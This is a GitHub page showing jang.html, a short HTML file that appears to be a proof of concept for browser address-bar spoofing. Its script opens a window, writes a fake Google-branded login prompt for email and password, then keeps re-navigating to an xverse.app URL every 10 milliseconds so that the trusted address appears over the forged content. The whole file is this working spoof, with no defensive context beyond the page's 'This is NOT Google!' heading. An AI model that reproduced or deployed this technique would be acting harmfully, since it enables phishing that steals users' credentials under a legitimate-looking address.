-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathjang.html
More file actions
23 lines (23 loc) · 794 Bytes
/
jang.html
File metadata and controls
23 lines (23 loc) · 794 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<!DOCTYPE html>
<html>
<body>
<button onclick="spoof()">Click to spoof</button>
<script>
function spoof() {
let win = window.open("", "_blank");
let payload = '<div style="text-align:center; font-family:Arial, sans-serif;">' +
'<img src="https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_160x56dp.png" alt="Google Logo" style="margin-top:20px;">' +
'<h1>This is NOT Google!</h1>' +
'<p>Please enter your credentials:</p>' +
'<input>email</input>' +
'<input>password</input>' +
'</div>';
win.document.write(payload);
win.document.close();
setInterval(function() {
win.location.replace("https://www.xverse.app:8080/");
}, 10); // Small interval to preserve the spoof
}
</script>
</body>
</html>